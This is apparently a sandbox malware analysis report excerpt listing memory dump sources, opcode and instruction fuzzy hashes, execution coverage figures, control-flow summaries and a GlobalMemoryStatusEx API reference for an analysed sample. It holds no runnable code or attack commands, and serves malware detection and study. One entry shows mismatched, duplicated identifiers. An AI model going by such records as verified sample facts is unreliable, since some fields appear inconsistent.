                                    • Opcode Fuzzy Hash: 53088833f8f8fcec0191ea9a2947a85c6c28b7efd8708a00164676714432e9a7
                                    • Instruction Fuzzy Hash: C7919F31B401059FCB04DBB8D854ABE7BF6FF89211B14446AE90ADB391EE399D068B91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 55f47919660b40fbe0d12407806f6c6e4fd33f45989fa096b74b864e7fd11492
                                    • Instruction ID: 6cbbe21abfa97e07a8ab83a5f33436f1b0a74b2a29b87634616ba8240d298b81
                                    • Opcode Fuzzy Hash: 55f47919660b40fbe0d12407806f6c6e4fd33f45989fa096b74b864e7fd11492
                                    • Instruction Fuzzy Hash: 0551E174E00204DFDB14DFE9C5527AEBBB2FB88712F20846EE516A7395DB349902CB91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: df6495bbfddc3ee6f887f262b2cb86891bb9fdfb90015ae413ce5b93c02c5696
                                    • Instruction ID: c59bc70548aff832c845165e4094f4caa032211bec646a191f98fed3d19d99e2
                                    • Opcode Fuzzy Hash: df6495bbfddc3ee6f887f262b2cb86891bb9fdfb90015ae413ce5b93c02c5696
                                    • Instruction Fuzzy Hash: 6D51E2B0E00105DFDB08CFE9C5527AEBAB2BB88702F50852EE516A7389DB349902CB51
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c1a51b78b35cb9df6bd5e953f796cecea6518db650e2641853641c9bb84af05b
                                    • Instruction ID: 58436a53bbe6ad6f1846f0a7efba19df9c9faaed892c5e79f2dac9ad9b3d36fe
                                    • Opcode Fuzzy Hash: c1a51b78b35cb9df6bd5e953f796cecea6518db650e2641853641c9bb84af05b
                                    • Instruction Fuzzy Hash: 87511835608251CFCB118FE9C8526AABFA5FF86622B1485AFE455CB292C334FC45CF91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0f4dd02176b77dab155b3fc87eb02247956d54ee08677c68a407f91a65fd513c
                                    • Instruction ID: 347a59e2506fe9562eebe5ab4e339fe0664fbfc055f1ac925da02a654f2c232c
                                    • Opcode Fuzzy Hash: 0f4dd02176b77dab155b3fc87eb02247956d54ee08677c68a407f91a65fd513c
                                    • Instruction Fuzzy Hash: 5051B4B5A0827CCFCB128BE8D894679BFB1FB45612F448A6FE566C7292D334C944CB11
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 59078270fdc84ce6e73fd0be9d4461172fa3e20fdfa58a562a8d8b5cd9f71b70
                                    • Instruction ID: 3f638031d73553434cd1575a2c6567a79d5d69ac740356e45dc36c662d3f6584
                                    • Opcode Fuzzy Hash: 59078270fdc84ce6e73fd0be9d4461172fa3e20fdfa58a562a8d8b5cd9f71b70
                                    • Instruction Fuzzy Hash: 6E512834609344CFD3058FA8D8417AABFB2BF41712F1484AFE455DB592CEB49885CF52
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 03ca989d2ece1c03046e19cf492d78434b0323cc920f432279532dce892c31af
                                    • Instruction ID: 911403537a730a459063c0ba83d5bc6a68bca6d50eacb1c068255baf88e9cd0f
                                    • Instruction ID: b602da209a801441bb3c07a2b936760603a5bec8b683635eee52c7481ce93ab0
                                    • Opcode Fuzzy Hash: a24c3459c639dbda71ee3209d95963e028e18ec48c5b5a0b51c5471258e41ea2
                                    • Instruction Fuzzy Hash: 7CE092B4D4020ADFD740EFAAC905A5EBBF0BB08601F5189A9D419E7221E77496058F91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4501897e3b87f64d48cfc6161457e9b59b970965887f87b0a2e8fb12511c299a
                                    • Instruction ID: 228d53b6ee5e13d17cc0b5b3d0d6c9e9a8464a7738ce181f217bf27e13699d99
                                    • Opcode Fuzzy Hash: 4501897e3b87f64d48cfc6161457e9b59b970965887f87b0a2e8fb12511c299a
                                    • Instruction Fuzzy Hash: 85D05EB5A5402C8FC7059AE4E4484ECBF30FB89213B00482AD513E3104D7301810CE54
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 72816856548808af68e5c68a482499d4950bb0dfae67acbdfc97fcd745bd7a17
                                    • Instruction ID: 0991e5ae3622e1543928a6b911c935237e20c82e537f048fe9d416502cc98c70
                                    • Opcode Fuzzy Hash: 72816856548808af68e5c68a482499d4950bb0dfae67acbdfc97fcd745bd7a17
                                    • Instruction Fuzzy Hash: 96D0C7703C4305FFE5A40A91DC16F31769DF784F51F10447DFA496A6D0CAB66841CA57
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 15babb26001fba8c177fea0b0a6d1f37fcdc2f4a8aed0a8308686d3cff6d6dd9
                                    • Instruction ID: b2708dcb90c4b77d0e5903ed8652c80d68edee32cd7399bd140456400f705c50
                                    • Opcode Fuzzy Hash: 15babb26001fba8c177fea0b0a6d1f37fcdc2f4a8aed0a8308686d3cff6d6dd9
                                    • Instruction Fuzzy Hash: 64D0123011534DAFDB118BB1A90C7597FD47B00295F04C02EED0585292DB31C015AB14
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d15d9a67fa8264e63e7b62f5c9801e5506f47f3ddf397b78d704c8bf8381a2d6
                                    • Instruction ID: ea1802a3178912fbbc9bccb7011eb1e4443ac5607fee7e013566de610bcd6dae
                                    • Opcode Fuzzy Hash: d15d9a67fa8264e63e7b62f5c9801e5506f47f3ddf397b78d704c8bf8381a2d6
                                    • Instruction Fuzzy Hash: B3D0C93061020DAFDB109AB1E80CA697ED9AB00396F00C43EE90582291DA72D4519A54
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f2f31a906504ac389022f56bbb30b57a3e87714c4c77f561fdb523b7293dc998
                                    • Instruction ID: ba49d2e90e9ec8f9890cef3b84be06a2eed1aa1058accf89c3321fb7f95af305
                                    • Opcode Fuzzy Hash: f2f31a906504ac389022f56bbb30b57a3e87714c4c77f561fdb523b7293dc998
                                    • Instruction Fuzzy Hash: 7DD0C93E00A2C09FC702AF64A8959417F71BF6620030A40C6D0908A063C529446CCB62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 13d9e3b5c85f11e7cdfe27f22eb6a42681d7ef1ae6ce39e1ad4d05287a8100a9
                                    • Instruction ID: 9da4b121dfdf800dabf51b969d0ebd1d0eb3773731209f5b484b9f64c8e4832f
                                    • Opcode Fuzzy Hash: 13d9e3b5c85f11e7cdfe27f22eb6a42681d7ef1ae6ce39e1ad4d05287a8100a9
                                    • Instruction Fuzzy Hash: 42C04C3D0440059E8605AB98C594C9ABEA9FF99301785DD56E3848B130CB25C81CDF49
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 79e38186d60692f6e9dcbbb60412b62bafd7e28d5e8f8809c50955849ef2d3ab
                                    • Instruction ID: 1da8cd33ffe51e3cabf1de0f485af37cd150db5b97c5ef338b42e364424506bf
                                    • Opcode Fuzzy Hash: 79e38186d60692f6e9dcbbb60412b62bafd7e28d5e8f8809c50955849ef2d3ab
                                    • Instruction Fuzzy Hash: 90D0CAB4E08208CFCB01CF80C0486EEBBB1BB08302F208418D01AA3240CB766D02CF40
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0046a621aaf117129cb1f3b0f2e717c6353c95845309d7a5d7e06bbf019e97d3
                                    • Instruction ID: 867b498240e6d47df60f15f3f8f67d93fde4a17a57ce6385ba9d7723a83adee2
                                    • Opcode Fuzzy Hash: 0046a621aaf117129cb1f3b0f2e717c6353c95845309d7a5d7e06bbf019e97d3
                                    • Instruction Fuzzy Hash: 3FB0922A5A8101AA900172A48A8092AA860BFB5703B808C2AA309C001084A498699F1B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2060061163.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5580000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 60c27a4e2ea3502d494dd0a692767d68f4d767558422acf5848eeb7b571b522b
                                    • Instruction ID: 5f03fd9d6d5cf52c9f9a2bfe19dcba6a7ea803ce694b81d53e690a835dcb99a3
                                    • Opcode Fuzzy Hash: 60c27a4e2ea3502d494dd0a692767d68f4d767558422acf5848eeb7b571b522b
                                    • Instruction Fuzzy Hash: 2C1292B24017468BE730CF65E84C1897BB9BB81B28F914309D2616F2E9DBB8354BCF44
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9a205153de327f9db62f06cf628f2162cc7bda002ee7bd40847fcaadca25d2a2
                                    • Instruction ID: adc87a2eda8c2c5ba71828d5819235bc796b1c6920f2c9e5a490c43eb878a385
                                    • Opcode Fuzzy Hash: 9a205153de327f9db62f06cf628f2162cc7bda002ee7bd40847fcaadca25d2a2
                                    • Instruction Fuzzy Hash: 8FD12931C2075A8ACB15EF68D990BD9B7B5FF95300F5087AAD04937220EB746AC9CB51
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 63779d13f062e87f7c77ba9deee413bd09fa783ef3cc695fdca13224b47fb19a
                                    • Instruction ID: c6c2107d49d5788613bbfcb8209dea62364fbba5deac63e0dceeba2fd243a38b
                                    • Opcode Fuzzy Hash: 63779d13f062e87f7c77ba9deee413bd09fa783ef3cc695fdca13224b47fb19a
                                    • Instruction Fuzzy Hash: 5ED10931C2071A8ACB15EF68D994BDDB7B5FF95300F5087AAD04937220EB746AC9CB51
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fe549a814a6d7f64d032ddb3720adaa2c9884dfc04f2aba24a240a271f189798
                                    • Instruction ID: 4e029b538816ea0339ccdd99cc202b76c5abeaa6df54fdbc83bba5cfd330c03a
                                    • Opcode Fuzzy Hash: fe549a814a6d7f64d032ddb3720adaa2c9884dfc04f2aba24a240a271f189798
                                    • Instruction Fuzzy Hash: 9FA17D32E0021A8FCF19DFB9C88059EBBB6FFC4304B15457AE905AB265DB31D915CB51
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2060061163.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5580000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 85392441721fec9aa240825ffa4a4dc8ab5fdba1c13e5740f5136e3a6fde24be
                                    • Instruction ID: 0cba040c9c3cbada355cab82fff1db804f1c9970b23f30140b5ec048e37971f7
                                    • Opcode Fuzzy Hash: 85392441721fec9aa240825ffa4a4dc8ab5fdba1c13e5740f5136e3a6fde24be
                                    • Instruction Fuzzy Hash: 44D139B28017458FDB21CF64E8481897BB9FB81B28F554319D1616F2E9DBB8348BCF44
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2062277673.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07ED0000, based on PE: true
                                    • Associated: 00000000.00000002.2062036493.0000000007ED0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ed0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8473ab3f9e5ba4a0df581f6d35f5e38c3af34888a71f136f503b9f1bf45b7224
                                    • Instruction ID: ff2764097cb52492539b3647a15baaffa93295e866e42b6646069ba1633c5f9b
                                    • Opcode Fuzzy Hash: 8473ab3f9e5ba4a0df581f6d35f5e38c3af34888a71f136f503b9f1bf45b7224
                                    • Instruction Fuzzy Hash: B721B8B5E156189FEB18CF6BC84069EFAF7AFC9300F14C0B9C90966254EB3409458F51

                                    Execution Graph

                                    Execution Coverage:11.5%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:17
                                    Total number of Limit Nodes:4
                                    execution_graph (node and edge listing omitted; the graph traces the path from 1870848 through 1871342 and 1877059 to 672d2b8 / 672d2a8, where GlobalMemoryStatusEx is called at 672d4fb)
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph (basic-block listing omitted; the function at 1876e9f calls 1876c08, 187634c and 1877988)
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q$LR]q
                                    • API String ID: 0-3917262905

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph (basic-block listing omitted; the function at 672e0b8 calls 672ce44 and 672ce50 and reaches GlobalMemoryStatusEx in block 672e187-672e214)
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3289475619.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6720000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph (basic-block listing omitted; the function at 672e1a0 calls GlobalMemoryStatusEx in block 672e1e6-672e214)
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE ref: 0672E207
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3289475619.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6720000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: GlobalMemoryStatus
                                    • String ID:
                                    • API String ID: 1890195054-0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PH]q
                                    • API String ID: 0-3168235125
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q
                                    • API String ID: 0-3081347316
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q
                                    • API String ID: 0-3081347316
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0d50ac7cb19093950f77b81a89e94b88553a30b3c6eed848dbea0f98d9fe8179
                                    • Instruction ID: 7971a5c1166e21f81e5f24f446fc530d80908712d206a7d8fba77db89cb63de0
                                    • Opcode Fuzzy Hash: 0d50ac7cb19093950f77b81a89e94b88553a30b3c6eed848dbea0f98d9fe8179
                                    • Instruction Fuzzy Hash: 6BD1AD30E002058FDB15DFA9D8907AEBBB6FF88324F14856AE909DB395D734D941CB91
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c46a3c0d26e06d14f471880a060db83b90fe93d1135419461116eabb238d6436
                                    • Instruction ID: a6d1115b5f35fd597a96a6337d2341379fac7855f0d49ad72180cabb1bd9b6c0
                                    • Opcode Fuzzy Hash: c46a3c0d26e06d14f471880a060db83b90fe93d1135419461116eabb238d6436
                                    • Instruction Fuzzy Hash: 23A14A70E00209DFDB10CFA9D9917ADBFF2AF88314F148529E859E7294EB74D985CB81
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 601276e1d812d908c5d4d5b60f3ed3f44d17582ca27ec36cd4ee8c86970565e6
                                    • Instruction ID: 022447f3f8b47f9f963dfca2fa02a68715f29e3674714bcfedc6dccffe7cebe4
                                    • Opcode Fuzzy Hash: 601276e1d812d908c5d4d5b60f3ed3f44d17582ca27ec36cd4ee8c86970565e6
                                    • Instruction Fuzzy Hash: FF915970E00209DFDB11DFA8D98579DBBF2BF88304F148129E819E7254EB34DA85CB92
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5f087764e256550465c0c56d85cadd9b1e0557a37d537c04b63ee181d6926116
                                    • Instruction ID: 1dbb16e905df12a21e0838a56901c3ec5af05bf946fb942a02ab5fed7c39649d
                                    • Opcode Fuzzy Hash: 5f087764e256550465c0c56d85cadd9b1e0557a37d537c04b63ee181d6926116
                                    • Instruction Fuzzy Hash: F87139B0E00259DFDF14DFADC8857AEBBF2AF88314F148129E415E7264EB749981CB91
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b52f7ba465957e39f7a09bb0cd2894f8c77b64850391d1d88d093f9b7785fbaf
                                    • Instruction ID: 272cb1a7d53c0f9d621482bcaf04767f7a577a7f432636513231a8adf240e462
                                    • Opcode Fuzzy Hash: b52f7ba465957e39f7a09bb0cd2894f8c77b64850391d1d88d093f9b7785fbaf
                                    • Instruction Fuzzy Hash: 197159B0E00249DFDF10DFADC9817AEBBF1AF88314F148129E415E7264EB749981CB91
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ce6b801de5cc7a01e7bd5c34a5cf2e9f3fece0b8fbf6c695faa187e3f4cf80c3
                                    • Instruction ID: e6af947f15f9fc11259727fb97fe4bc34ac5dbe7d35a8017796853272aa064be
                                    • Opcode Fuzzy Hash: ce6b801de5cc7a01e7bd5c34a5cf2e9f3fece0b8fbf6c695faa187e3f4cf80c3
                                    • Instruction Fuzzy Hash: EF513371D106188FEB18CFA9C884B9DBBB1FF48314F248529E819AB391E774A944CF95
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5be092c5817bc18a25332ffc002f585b3cf5fe613e27f9a38ece64d88f752e90
                                    • Instruction ID: 9b03b202e11002f1fab34c5d4f3133e0b5c164fc46949ead47303e80385fcf3c
                                    • Opcode Fuzzy Hash: 5be092c5817bc18a25332ffc002f585b3cf5fe613e27f9a38ece64d88f752e90
                                    • Instruction Fuzzy Hash: 07513571D106188FEB14CFA9C884B9DBBB1BF48314F248529E819BB351E774A944CF95
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dd67d13c83fe0acc1e26b746d949557487aea0847c7fc06f300fbedfda6f080b
                                    • Instruction ID: 9897e4b02be0d16b648588041a6051c3ce589082dcc51c16fe5cc0a71294a394
                                    • Opcode Fuzzy Hash: dd67d13c83fe0acc1e26b746d949557487aea0847c7fc06f300fbedfda6f080b
                                    • Instruction Fuzzy Hash: B741E871752341CFCB09DF2CF99C9447FA9EB5930470892A9D0109B23ADB28AD09DBE5
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a09320e1be8c5f6814c5470fd7b467116a6ecdb4a2d3b13e055ee14a89e802fd
                                    • Instruction ID: f6474e5ca2b2306438d465848407d422817908c98ec151932b2e31881eaf1c32
                                    • Opcode Fuzzy Hash: a09320e1be8c5f6814c5470fd7b467116a6ecdb4a2d3b13e055ee14a89e802fd
                                    • Instruction Fuzzy Hash: 5D41D770742341CFCB09DF2CF98C9447FA9EB9930430492A8D0219B23ADB386D09DBE6
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cafc51b17a643a832bb7fe34ba189b0eaaf528941f0609f77070572e7a8b54bb
                                    • Instruction ID: a17104299e37121a3f9ff5fb71eb4ec4f43b52c26ae25d8b7f010260fd760edb
                                    • Opcode Fuzzy Hash: cafc51b17a643a832bb7fe34ba189b0eaaf528941f0609f77070572e7a8b54bb
                                    • Instruction Fuzzy Hash: 3731BE31E0060A8BCB59CF69D9946AEB7B6FF89300F10C519E916E7350DB70ED42CB50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6b41aba560442c63b9a87cfba25e7a74a52131b77325da8c66e447f3cc311bd4
                                    • Instruction ID: 5ab48532b974915d9c79e94e2a7ba07193c8776aa60107df1310b3e667284382
                                    • Opcode Fuzzy Hash: 6b41aba560442c63b9a87cfba25e7a74a52131b77325da8c66e447f3cc311bd4
                                    • Instruction Fuzzy Hash: 0641FFB0D002499FDB14DFA9C584ADEBFF5BF48314F148029E809AB210DB75AA85CB90
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c2b619f497a684f9d39aa9cbcfeadc48708663d04aa2aa7908614a339ba34d39
